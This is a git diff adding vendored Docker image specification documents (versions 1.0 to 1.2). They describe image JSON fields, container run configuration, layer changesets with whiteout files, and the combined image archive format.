+ Gives the name and/or email address of the person or entity which + created and is responsible for maintaining the image. +
+
+ architecture string +
+
+ The CPU architecture which the binaries in this image are built to run + on. Possible values include: +
    +
  • 386
  • +
  • amd64
  • +
  • arm
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ os string +
+
+ The name of the operating system which the image is built to run on. + Possible values include: +
    +
  • darwin
  • +
  • freebsd
  • +
  • linux
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ config struct +
+
+ The execution parameters which should be used as a base when running a + container using the image. This field can be null, in + which case any execution parameters should be specified at creation of + the container. + +

Container RunConfig Field Descriptions

+ +
+
+ User string +
+
+

The username or UID which the process in the container should + run as. This acts as a default value to use when the value is + not specified when creating a container.

+ +

All of the following are valid:

+ +
    +
  • user
  • +
  • uid
  • +
  • user:group
  • +
  • uid:gid
  • +
  • uid:group
  • +
  • user:gid
  • +
+ +

If group/gid is not specified, the + default group and supplementary groups of the given + user/uid in /etc/passwd + from the container are applied.

+
+
+ Memory integer +
+
+ Memory limit (in bytes). This acts as a default value to use + when the value is not specified when creating a container. +
+
+ MemorySwap integer +
+
+ Total memory usage (memory + swap); set to -1 to + disable swap. This acts as a default value to use when the + value is not specified when creating a container. +
+
+ CpuShares integer +
+
+ CPU shares (relative weight vs. other containers). This acts as + a default value to use when the value is not specified when + creating a container. +
+
+ ExposedPorts struct +
+
+ A set of ports to expose from a container running this image. + This JSON structure value is unusual because it is a direct + JSON serialization of the Go type + map[string]struct{} and is represented in JSON as + an object mapping its keys to an empty object. Here is an + example: + +
{
+    "8080": {},
+    "53/udp": {},
+    "2356/tcp": {}
+}
+ + Its keys can be in the format of: +
    +
  • + "port/tcp" +
  • +
  • + "port/udp" +
  • +
  • + "port" +
  • +
+ with the default protocol being "tcp" if not + specified. + + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Env array of strings +
+
+ Entries are in the format of VARNAME="var value". + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Entrypoint array of strings +
+
+ A list of arguments to use as the command to execute when the + container starts. This value acts as a default and is replaced + by an entrypoint specified when creating a container. +
+
+ Cmd array of strings +
+
+ Default arguments to the entry point of the container. These + values act as defaults and are replaced with any specified when + creating a container. If an Entrypoint value is + not specified, then the first entry of the Cmd + array should be interpreted as the executable to run. +
+
+ Volumes struct +
+
+ A set of directories which should be created as data volumes in + a container running this image. This JSON structure value is + unusual because it is a direct JSON serialization of the Go + type map[string]struct{} and is represented in + JSON as an object mapping its keys to an empty object. Here is + an example: +
{
+    "/var/my-app-data/": {},
+    "/etc/some-config.d/": {},
+}
+
+
+ WorkingDir string +
+
+ Sets the current working directory of the entry point process + in the container. This value acts as a default and is replaced + by a working directory specified when creating a container. +
+
+
+
+ rootfs struct +
+
+ The rootfs key references the layer content addresses used by the + image. This makes the image config hash depend on the filesystem hash. + rootfs has two subkeys: + +
    +
  • + type is usually set to layers. +
  • +
  • + diff_ids is an array of layer content hashes (DiffIDs), in order from bottom-most to top-most. +
  • +
+ + + Here is an example rootfs section: + +
"rootfs": {
+  "diff_ids": [
+    "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
+    "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef",
+    "sha256:13f53e08df5a220ab6d13c58b2bf83a59cbdc2e04d0a3f041ddf4b0ba4112d49"
+  ],
+  "type": "layers"
+}
+
+
+ history struct +
+
+ history is an array of objects describing the history of + each layer. The array is ordered from bottom-most layer to top-most + layer. The object has the following fields. + +
    +
  • + created: Creation time, expressed as a ISO-8601 formatted + combined date and time +
  • +
  • + author: The author of the build point +
  • +
  • + created_by: The command which created the layer +
  • +
  • + comment: A custom message set when creating the layer +
  • +
  • + empty_layer: This field is used to mark if the history + item created a filesystem diff. It is set to true if this history + item doesn't correspond to an actual layer in the rootfs section + (for example, a command like ENV which results in no change to the + filesystem). +
  • +
+ +Here is an example history section: + +
"history": [
+  {
+    "created": "2015-10-31T22:22:54.690851953Z",
+    "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"
+  },
+  {
+    "created": "2015-10-31T22:22:55.613815829Z",
+    "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
+    "empty_layer": true
+  }
+]
+
+
+ +Any extra fields in the Image JSON struct are considered implementation +specific and should be ignored by any implementations which are unable to +interpret them. + +## Creating an Image Filesystem Changeset + +An example of creating an Image Filesystem Changeset follows. + +An image root filesystem is first created as an empty directory. Here is the +initial empty directory structure for the a changeset using the +randomly-generated directory name `c3167915dc9d` ([actual layer DiffIDs are +generated based on the content](#id_desc)). + +``` +c3167915dc9d/ +``` + +Files and directories are then created: + +``` +c3167915dc9d/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +The `c3167915dc9d` directory is then committed as a plain Tar archive with +entries for the following files: + +``` +etc/my-app-config +bin/my-app-binary +bin/my-app-tools +``` + +To make changes to the filesystem of this container image, create a new +directory, such as `f60c56784b83`, and initialize it with a snapshot of the +parent image's root filesystem, so that the directory is identical to that +of `c3167915dc9d`. NOTE: a copy-on-write or union filesystem can make this very +efficient: + +``` +f60c56784b83/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +This example change is going add a configuration directory at `/etc/my-app.d` +which contains a default config file. There's also a change to the +`my-app-tools` binary to handle the config layout change. The `f60c56784b83` +directory then looks like this: + +``` +f60c56784b83/ + etc/ + my-app.d/ + default.cfg + bin/ + my-app-binary + my-app-tools +``` + +This reflects the removal of `/etc/my-app-config` and creation of a file and +directory at `/etc/my-app.d/default.cfg`. `/bin/my-app-tools` has also been +replaced with an updated version. Before committing this directory to a +changeset, because it has a parent image, it is first compared with the +directory tree of the parent snapshot, `f60c56784b83`, looking for files and +directories that have been added, modified, or removed. The following changeset +is found: + +``` +Added: /etc/my-app.d/default.cfg +Modified: /bin/my-app-tools +Deleted: /etc/my-app-config +``` + +A Tar Archive is then created which contains *only* this changeset: The added +and modified files and directories in their entirety, and for each deleted item +an entry for an empty file at the same location but with the basename of the +deleted file or directory prefixed with `.wh.`. The filenames prefixed with +`.wh.` are known as "whiteout" files. NOTE: For this reason, it is not possible +to create an image root filesystem which contains a file or directory with a +name beginning with `.wh.`. The resulting Tar archive for `f60c56784b83` has +the following entries: + +``` +/etc/my-app.d/default.cfg +/bin/my-app-tools +/etc/.wh.my-app-config +``` + +Any given image is likely to be composed of several of these Image Filesystem +Changeset tar archives. + +## Combined Image JSON + Filesystem Changeset Format + +There is also a format for a single archive which contains complete information +about an image, including: + + - repository names/tags + - image configuration JSON file + - all tar archives of each layer filesystem changesets + +For example, here's what the full archive of `library/busybox` is (displayed in +`tree` format): + +``` +. +├── 47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json +├── 5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198 +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── manifest.json +└── repositories +``` + +There is a directory for each layer in the image. Each directory is named with +a 64 character hex name that is deterministically generated from the layer +information. These names are not necessarily layer DiffIDs or ChainIDs. Each of +these directories contains 3 files: + + * `VERSION` - The schema version of the `json` file + * `json` - The legacy JSON metadata for an image layer. In this version of + the image specification, layers don't have JSON metadata, but in + [version 1](v1.md), they did. A file is created for each layer in the + v1 format for backward compatibility. + * `layer.tar` - The Tar archive of the filesystem changeset for an image + layer. + +Note that this directory layout is only important for backward compatibility. +Current implementations use the paths specified in `manifest.json`. + +The content of the `VERSION` files is simply the semantic version of the JSON +metadata schema: + +``` +1.0 +``` + +The `repositories` file is another JSON file which describes names/tags: + +``` +{ + "busybox":{ + "latest":"5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a" + } +} +``` + +Every key in this object is the name of a repository, and maps to a collection +of tag suffixes. Each tag maps to the ID of the image represented by that tag. +This file is only used for backwards compatibility. Current implementations use +the `manifest.json` file instead. + +The `manifest.json` file provides the image JSON for the top-level image, and +optionally for parent images that this image was derived from. It consists of +an array of metadata entries: + +``` +[ + { + "Config": "47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json", + "RepoTags": ["busybox:latest"], + "Layers": [ + "a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198/layer.tar", + "5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a/layer.tar" + ] + } +] +``` + +There is an entry in the array for each image. + +The `Config` field references another file in the tar which includes the image +JSON for this image. + +The `RepoTags` field lists references pointing to this image. + +The `Layers` field points to the filesystem changeset tars. + +An optional `Parent` field references the imageID of the parent image. This +parent must be part of the same `manifest.json` file. + +This file shouldn't be confused with the distribution manifest, used to push +and pull images. + +Generally, implementations that support this version of the spec will use +the `manifest.json` file if available, and older implementations will use the +legacy `*/json` files and `repositories`. diff --git a/vendor/github.com/docker/docker/image/spec/v1.2.md b/vendor/github.com/docker/docker/image/spec/v1.2.md new file mode 100644 index 0000000000..6c641cafec --- /dev/null +++ b/vendor/github.com/docker/docker/image/spec/v1.2.md @@ -0,0 +1,696 @@ +# Docker Image Specification v1.2.0 + +An *Image* is an ordered collection of root filesystem changes and the +corresponding execution parameters for use within a container runtime. This +specification outlines the format of these filesystem changes and corresponding +parameters and describes how to create and use them for use with a container +runtime and execution tool. + +This version of the image specification was adopted starting in Docker 1.12. + +## Terminology + +This specification uses the following terms: + +
+
+ Layer +
+
+ Images are composed of layers. Each layer is a set of filesystem + changes. Layers do not have configuration metadata such as environment + variables or default arguments - these are properties of the image as a + whole rather than any particular layer. +
+
+ Image JSON +
+
+ Each image has an associated JSON structure which describes some + basic information about the image such as date created, author, and the + ID of its parent image as well as execution/runtime configuration like + its entry point, default arguments, CPU/memory shares, networking, and + volumes. The JSON structure also references a cryptographic hash of + each layer used by the image, and provides history information for + those layers. This JSON is considered to be immutable, because changing + it would change the computed ImageID. Changing it means creating a new + derived image, instead of changing the existing image. +
+
+ Image Filesystem Changeset +
+
+ Each layer has an archive of the files which have been added, changed, + or deleted relative to its parent layer. Using a layer-based or union + filesystem such as AUFS, or by computing the diff from filesystem + snapshots, the filesystem changeset can be used to present a series of + image layers as if they were one cohesive filesystem. +
+
+ Layer DiffID +
+
+ Layers are referenced by cryptographic hashes of their serialized + representation. This is a SHA256 digest over the tar archive used to + transport the layer, represented as a hexadecimal encoding of 256 bits, e.g., + sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Layers must be packed and unpacked reproducibly to avoid changing the + layer ID, for example by using tar-split to save the tar headers. Note + that the digest used as the layer ID is taken over an uncompressed + version of the tar. +
+
+ Layer ChainID +
+
+ For convenience, it is sometimes useful to refer to a stack of layers + with a single identifier. This is called a ChainID. For a + single layer (or the layer at the bottom of a stack), the + ChainID is equal to the layer's DiffID. + Otherwise the ChainID is given by the formula: + ChainID(layerN) = SHA256hex(ChainID(layerN-1) + " " + DiffID(layerN)). +
+
+ ImageID +
+
+ Each image's ID is given by the SHA256 hash of its configuration JSON. It is + represented as a hexadecimal encoding of 256 bits, e.g., + sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Since the configuration JSON that gets hashed references hashes of each + layer in the image, this formulation of the ImageID makes images + content-addressable. +
+
+ Tag +
+
+ A tag serves to map a descriptive, user-given name to any single image + ID. Tag values are limited to the set of characters + [a-zA-Z0-9_.-], except they may not start with a . + or - character. Tags are limited to 127 characters. +
+
+ Repository +
+
+ A collection of tags grouped under a common prefix (the name component + before :). For example, in an image tagged with the name + my-app:3.1.4, my-app is the Repository + component of the name. A repository name is made up of slash-separated + name components, optionally prefixed by a DNS hostname. The hostname + must follow comply with standard DNS rules, but may not contain + _ characters. If a hostname is present, it may optionally + be followed by a port number in the format :8080. + Name components may contain lowercase characters, digits, and + separators. A separator is defined as a period, one or two underscores, + or one or more dashes. A name component may not start or end with + a separator. +
+
+ +## Image JSON Description + +Here is an example image JSON file: + +``` +{ + "created": "2015-10-31T22:22:56.015925234Z", + "author": "Alyssa P. Hacker <alyspdev@example.com>", + "architecture": "amd64", + "os": "linux", + "config": { + "User": "alice", + "Memory": 2048, + "MemorySwap": 4096, + "CpuShares": 8, + "ExposedPorts": { + "8080/tcp": {} + }, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "FOO=docker_is_a_really", + "BAR=great_tool_you_know" + ], + "Entrypoint": [ + "/bin/my-app-binary" + ], + "Cmd": [ + "--foreground", + "--config", + "/etc/my-app.d/default.cfg" + ], + "Volumes": { + "/var/job-result-data": {}, + "/var/log/my-app-logs": {}, + }, + "WorkingDir": "/home/alice", + }, + "rootfs": { + "diff_ids": [ + "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1", + "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + ], + "type": "layers" + }, + "history": [ + { + "created": "2015-10-31T22:22:54.690851953Z", + "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /" + }, + { + "created": "2015-10-31T22:22:55.613815829Z", + "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]", + "empty_layer": true + } + ] +} +``` + +Note that image JSON files produced by Docker don't contain formatting +whitespace. It has been added to this example for clarity. + +### Image JSON Field Descriptions + +
+
+ created string +
+
+ ISO-8601 formatted combined date and time at which the image was + created. +
+
+ author string +
+
+ Gives the name and/or email address of the person or entity which + created and is responsible for maintaining the image. +
+
+ architecture string +
+
+ The CPU architecture which the binaries in this image are built to run + on. Possible values include: +
    +
  • 386
  • +
  • amd64
  • +
  • arm
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ os string +
+
+ The name of the operating system which the image is built to run on. + Possible values include: +
    +
  • darwin
  • +
  • freebsd
  • +
  • linux
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ config struct +
+
+ The execution parameters which should be used as a base when running a + container using the image. This field can be null, in + which case any execution parameters should be specified at creation of + the container. + +

Container RunConfig Field Descriptions

+ +
+
+ User string +
+
+

The username or UID which the process in the container should + run as. This acts as a default value to use when the value is + not specified when creating a container.

+ +

All of the following are valid:

+ +
    +
  • user
  • +
  • uid
  • +
  • user:group
  • +
  • uid:gid
  • +
  • uid:group
  • +
  • user:gid
  • +
+ +

If group/gid is not specified, the + default group and supplementary groups of the given + user/uid in /etc/passwd + from the container are applied.

+
+
+ Memory integer +
+
+ Memory limit (in bytes). This acts as a default value to use + when the value is not specified when creating a container. +
+
+ MemorySwap integer +
+
+ Total memory usage (memory + swap); set to -1 to + disable swap. This acts as a default value to use when the + value is not specified when creating a container. +
+
+ CpuShares integer +
+
+ CPU shares (relative weight vs. other containers). This acts as + a default value to use when the value is not specified when + creating a container. +
+
+ ExposedPorts struct +
+
+ A set of ports to expose from a container running this image. + This JSON structure value is unusual because it is a direct + JSON serialization of the Go type + map[string]struct{} and is represented in JSON as + an object mapping its keys to an empty object. Here is an + example: + +
{
+    "8080": {},
+    "53/udp": {},
+    "2356/tcp": {}
+}
+ + Its keys can be in the format of: +
    +
  • + "port/tcp" +
  • +
  • + "port/udp" +
  • +
  • + "port" +
  • +
+ with the default protocol being "tcp" if not + specified. + + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Env array of strings +
+
+ Entries are in the format of VARNAME="var value". + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Entrypoint array of strings +
+
+ A list of arguments to use as the command to execute when the + container starts. This value acts as a default and is replaced + by an entrypoint specified when creating a container. +
+
+ Cmd array of strings +
+
+ Default arguments to the entry point of the container. These + values act as defaults and are replaced with any specified when + creating a container. If an Entrypoint value is + not specified, then the first entry of the Cmd + array should be interpreted as the executable to run. +
+
+ Healthcheck struct +
+
+ A test to perform to determine whether the container is healthy. + Here is an example: +
{
+  "Test": [
+      "CMD-SHELL",
+      "/usr/bin/check-health localhost"
+  ],
+  "Interval": 30000000000,
+  "Timeout": 10000000000,
+  "Retries": 3
+}
+ The object has the following fields. +
+
+ Test array of strings +
+
+ The test to perform to check that the container is healthy. + The options are: +
    +
  • [] : inherit healthcheck from base image
  • +
  • ["NONE"] : disable healthcheck
  • +
  • ["CMD", arg1, arg2, ...] : exec arguments directly
  • +
  • ["CMD-SHELL", command] : run command with system's default shell
  • +
+ + The test command should exit with a status of 0 if the container is healthy, + or with 1 if it is unhealthy. +
+
+ Interval integer +
+
+ Number of nanoseconds to wait between probe attempts. +
+
+ Timeout integer +
+
+ Number of nanoseconds to wait before considering the check to have hung. +
+
+ Retries integer +
+
+ The number of consecutive failures needed to consider a container as unhealthy. +
+
+ + In each case, the field can be omitted to indicate that the + value should be inherited from the base layer. + + These values act as defaults and are merged with any specified + when creating a container. +
+
+ Volumes struct +
+
+ A set of directories which should be created as data volumes in + a container running this image. This JSON structure value is + unusual because it is a direct JSON serialization of the Go + type map[string]struct{} and is represented in + JSON as an object mapping its keys to an empty object. Here is + an example: +
{
+    "/var/my-app-data/": {},
+    "/etc/some-config.d/": {},
+}
+
+
+ WorkingDir string +
+
+ Sets the current working directory of the entry point process + in the container. This value acts as a default and is replaced + by a working directory specified when creating a container. +
+
+
+
+ rootfs struct +
+
+ The rootfs key references the layer content addresses used by the + image. This makes the image config hash depend on the filesystem hash. + rootfs has two subkeys: + +
    +
  • + type is usually set to layers. +
  • +
  • + diff_ids is an array of layer content hashes (DiffIDs), in order from bottom-most to top-most. +
  • +
+ + + Here is an example rootfs section: + +
"rootfs": {
+  "diff_ids": [
+    "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
+    "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef",
+    "sha256:13f53e08df5a220ab6d13c58b2bf83a59cbdc2e04d0a3f041ddf4b0ba4112d49"
+  ],
+  "type": "layers"
+}
+
+
+ history struct +
+
+ history is an array of objects describing the history of + each layer. The array is ordered from bottom-most layer to top-most + layer. The object has the following fields. + +
    +
  • + created: Creation time, expressed as a ISO-8601 formatted + combined date and time +
  • +
  • + author: The author of the build point +
  • +
  • + created_by: The command which created the layer +
  • +
  • + comment: A custom message set when creating the layer +
  • +
  • + empty_layer: This field is used to mark if the history + item created a filesystem diff. It is set to true if this history + item doesn't correspond to an actual layer in the rootfs section + (for example, a command like ENV which results in no change to the + filesystem). +
  • +
+ +Here is an example history section: + +
"history": [
+  {
+    "created": "2015-10-31T22:22:54.690851953Z",
+    "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"
+  },
+  {
+    "created": "2015-10-31T22:22:55.613815829Z",
+    "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
+    "empty_layer": true
+  }
+]
+
+
+ +Any extra fields in the Image JSON struct are considered implementation +specific and should be ignored by any implementations which are unable to +interpret them. + +## Creating an Image Filesystem Changeset + +An example of creating an Image Filesystem Changeset follows. + +An image root filesystem is first created as an empty directory. Here is the +initial empty directory structure for the a changeset using the +randomly-generated directory name `c3167915dc9d` ([actual layer DiffIDs are +generated based on the content](#id_desc)). + +``` +c3167915dc9d/ +``` + +Files and directories are then created: + +``` +c3167915dc9d/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +The `c3167915dc9d` directory is then committed as a plain Tar archive with +entries for the following files: + +``` +etc/my-app-config +bin/my-app-binary +bin/my-app-tools +``` + +To make changes to the filesystem of this container image, create a new +directory, such as `f60c56784b83`, and initialize it with a snapshot of the +parent image's root filesystem, so that the directory is identical to that +of `c3167915dc9d`. NOTE: a copy-on-write or union filesystem can make this very +efficient: + +``` +f60c56784b83/ + etc/ + my-app-config + bin/ + my-app-binary + my-app-tools +``` + +This example change is going add a configuration directory at `/etc/my-app.d` +which contains a default config file. There's also a change to the +`my-app-tools` binary to handle the config layout change. The `f60c56784b83` +directory then looks like this: + +``` +f60c56784b83/ + etc/ + my-app.d/ + default.cfg + bin/ + my-app-binary + my-app-tools +``` + +This reflects the removal of `/etc/my-app-config` and creation of a file and +directory at `/etc/my-app.d/default.cfg`. `/bin/my-app-tools` has also been +replaced with an updated version. Before committing this directory to a +changeset, because it has a parent image, it is first compared with the +directory tree of the parent snapshot, `f60c56784b83`, looking for files and +directories that have been added, modified, or removed. The following changeset +is found: + +``` +Added: /etc/my-app.d/default.cfg +Modified: /bin/my-app-tools +Deleted: /etc/my-app-config +``` + +A Tar Archive is then created which contains *only* this changeset: The added +and modified files and directories in their entirety, and for each deleted item +an entry for an empty file at the same location but with the basename of the +deleted file or directory prefixed with `.wh.`. The filenames prefixed with +`.wh.` are known as "whiteout" files. NOTE: For this reason, it is not possible +to create an image root filesystem which contains a file or directory with a +name beginning with `.wh.`. The resulting Tar archive for `f60c56784b83` has +the following entries: + +``` +/etc/my-app.d/default.cfg +/bin/my-app-tools +/etc/.wh.my-app-config +``` + +Any given image is likely to be composed of several of these Image Filesystem +Changeset tar archives. + +## Combined Image JSON + Filesystem Changeset Format + +There is also a format for a single archive which contains complete information +about an image, including: + + - repository names/tags + - image configuration JSON file + - all tar archives of each layer filesystem changesets + +For example, here's what the full archive of `library/busybox` is (displayed in +`tree` format): + +``` +. +├── 47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json +├── 5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198 +│   ├── VERSION +│   ├── json +│   └── layer.tar +├── manifest.json +└── repositories +``` + +There is a directory for each layer in the image. Each directory is named with +a 64 character hex name that is deterministically generated from the layer +information. These names are not necessarily layer DiffIDs or ChainIDs. Each of +these directories contains 3 files: + + * `VERSION` - The schema version of the `json` file + * `json` - The legacy JSON metadata for an image layer. In this version of + the image specification, layers don't have JSON metadata, but in + [version 1](v1.md), they did. A file is created for each layer in the + v1 format for backward compatibility. + * `layer.tar` - The Tar archive of the filesystem changeset for an image + layer. + +Note that this directory layout is only important for backward compatibility. +Current implementations use the paths specified in `manifest.json`. + +The content of the `VERSION` files is simply the semantic version of the JSON +metadata schema: + +``` +1.0 +``` + +The `repositories` file is another JSON file which describes names/tags: + +``` +{ + "busybox":{ + "latest":"5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a" + } +} +``` + +Every key in this object is the name of a repository, and maps to a collection +of tag suffixes. Each tag maps to the ID of the image represented by that tag. +This file is only used for backwards compatibility. Current implementations use +the `manifest.json` file instead. + +The `manifest.json` file provides the image JSON for the top-level image, and +optionally for parent images that this image was derived from. It consists of +an array of metadata entries: + +``` +[ + { + "Config": "47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json", + "RepoTags": ["busybox:latest"], + "Layers": [ + "a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198/layer.tar", + "5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a/layer.tar" + ] + } +] +``` + +There is an entry in the array for each image. + +The `Config` field references another file in the tar which includes the image +JSON for this image. + +The `RepoTags` field lists references pointing to this image. + +The `Layers` field points to the filesystem changeset tars. + +An optional `Parent` field references the imageID of the parent image. This +parent must be part of the same `manifest.json` file. + +This file shouldn't be confused with the distribution manifest, used to push +and pull images. + +Generally, implementations that support this version of the spec will use +the `manifest.json` file if available, and older implementations will use the +legacy `*/json` files and `repositories`. diff --git a/vendor/github.com/docker/docker/image/spec/v1.md b/vendor/github.com/docker/docker/image/spec/v1.md new file mode 100644 index 0000000000..57a599b8ff --- /dev/null +++ b/vendor/github.com/docker/docker/image/spec/v1.md @@ -0,0 +1,573 @@ +# Docker Image Specification v1.0.0 + +An *Image* is an ordered collection of root filesystem changes and the +corresponding execution parameters for use within a container runtime. This +specification outlines the format of these filesystem changes and corresponding +parameters and describes how to create and use them for use with a container +runtime and execution tool. + +## Terminology + +This specification uses the following terms: + +
+
+ Layer +
+
+ Images are composed of layers. Image layer is a general + term which may be used to refer to one or both of the following: + +
    +
  1. The metadata for the layer, described in the JSON format.
  2. +
  3. The filesystem changes described by a layer.
  4. +
+ + To refer to the former you may use the term Layer JSON or + Layer Metadata. To refer to the latter you may use the term + Image Filesystem Changeset or Image Diff. +
+
+ Image JSON +
+
+ Each layer has an associated JSON structure which describes some + basic information about the image such as date created, author, and the + ID of its parent image as well as execution/runtime configuration like + its entry point, default arguments, CPU/memory shares, networking, and + volumes. +
+
+ Image Filesystem Changeset +
+
+ Each layer has an archive of the files which have been added, changed, + or deleted relative to its parent layer. Using a layer-based or union + filesystem such as AUFS, or by computing the diff from filesystem + snapshots, the filesystem changeset can be used to present a series of + image layers as if they were one cohesive filesystem. +
+
+ Image ID +
+
+ Each layer is given an ID upon its creation. It is + represented as a hexadecimal encoding of 256 bits, e.g., + a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9. + Image IDs should be sufficiently random so as to be globally unique. + 32 bytes read from /dev/urandom is sufficient for all + practical purposes. Alternatively, an image ID may be derived as a + cryptographic hash of image contents as the result is considered + indistinguishable from random. The choice is left up to implementors. +
+
+ Image Parent +
+
+ Most layer metadata structs contain a parent field which + refers to the Image from which another directly descends. An image + contains a separate JSON metadata file and set of changes relative to + the filesystem of its parent image. Image Ancestor and + Image Descendant are also common terms. +
+
+ Image Checksum +
+
+ Layer metadata structs contain a cryptographic hash of the contents of + the layer's filesystem changeset. Though the set of changes exists as a + simple Tar archive, two archives with identical filenames and content + will have different SHA digests if the last-access or last-modified + times of any entries differ. For this reason, image checksums are + generated using the TarSum algorithm which produces a cryptographic + hash of file contents and selected headers only. Details of this + algorithm are described in the separate TarSum specification. +
+
+ Tag +
+
+ A tag serves to map a descriptive, user-given name to any single image + ID. An image name suffix (the name component after :) is + often referred to as a tag as well, though it strictly refers to the + full name of an image. Acceptable values for a tag suffix are + implementation specific, but they SHOULD be limited to the set of + alphanumeric characters [a-zA-z0-9], punctuation + characters [._-], and MUST NOT contain a : + character. +
+
+ Repository +
+
+ A collection of tags grouped under a common prefix (the name component + before :). For example, in an image tagged with the name + my-app:3.1.4, my-app is the Repository + component of the name. Acceptable values for repository name are + implementation specific, but they SHOULD be limited to the set of + alphanumeric characters [a-zA-z0-9], and punctuation + characters [._-], however it MAY contain additional + / and : characters for organizational + purposes, with the last : character being interpreted + dividing the repository component of the name from the tag suffix + component. +
+
+ +## Image JSON Description + +Here is an example image JSON file: + +``` +{ + "id": "a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9", + "parent": "c6e3cedcda2e3982a1a6760e178355e8e65f7b80e4e5248743fa3549d284e024", + "checksum": "tarsum.v1+sha256:e58fcf7418d2390dec8e8fb69d88c06ec07039d651fedc3aa72af9972e7d046b", + "created": "2014-10-13T21:19:18.674353812Z", + "author": "Alyssa P. Hacker <alyspdev@example.com>", + "architecture": "amd64", + "os": "linux", + "Size": 271828, + "config": { + "User": "alice", + "Memory": 2048, + "MemorySwap": 4096, + "CpuShares": 8, + "ExposedPorts": { + "8080/tcp": {} + }, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "FOO=docker_is_a_really", + "BAR=great_tool_you_know" + ], + "Entrypoint": [ + "/bin/my-app-binary" + ], + "Cmd": [ + "--foreground", + "--config", + "/etc/my-app.d/default.cfg" + ], + "Volumes": { + "/var/job-result-data": {}, + "/var/log/my-app-logs": {}, + }, + "WorkingDir": "/home/alice", + } +} +``` + +### Image JSON Field Descriptions + +
+
+ id string +
+
+ Randomly generated, 256-bit, hexadecimal encoded. Uniquely identifies + the image. +
+
+ parent string +
+
+ ID of the parent image. If there is no parent image then this field + should be omitted. A collection of images may share many of the same + ancestor layers. This organizational structure is strictly a tree with + any one layer having either no parent or a single parent and zero or + more descendant layers. Cycles are not allowed and implementations + should be careful to avoid creating them or iterating through a cycle + indefinitely. +
+
+ created string +
+
+ ISO-8601 formatted combined date and time at which the image was + created. +
+
+ author string +
+
+ Gives the name and/or email address of the person or entity which + created and is responsible for maintaining the image. +
+
+ architecture string +
+
+ The CPU architecture which the binaries in this image are built to run + on. Possible values include: +
    +
  • 386
  • +
  • amd64
  • +
  • arm
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ os string +
+
+ The name of the operating system which the image is built to run on. + Possible values include: +
    +
  • darwin
  • +
  • freebsd
  • +
  • linux
  • +
+ More values may be supported in the future and any of these may or may + not be supported by a given container runtime implementation. +
+
+ checksum string +
+
+ Image Checksum of the filesystem changeset associated with the image + layer. +
+
+ Size integer +
+
+ The size in bytes of the filesystem changeset associated with the image + layer. +
+
+ config struct +
+
+ The execution parameters which should be used as a base when running a + container using the image. This field can be null, in + which case any execution parameters should be specified at creation of + the container. + +

Container RunConfig Field Descriptions

+ +
+
+ User string +
+
+

The username or UID which the process in the container should + run as. This acts as a default value to use when the value is + not specified when creating a container.

+ +

All of the following are valid:

+ +
    +
  • user
  • +
  • uid
  • +
  • user:group
  • +
  • uid:gid
  • +
  • uid:group
  • +
  • user:gid
  • +
+ +

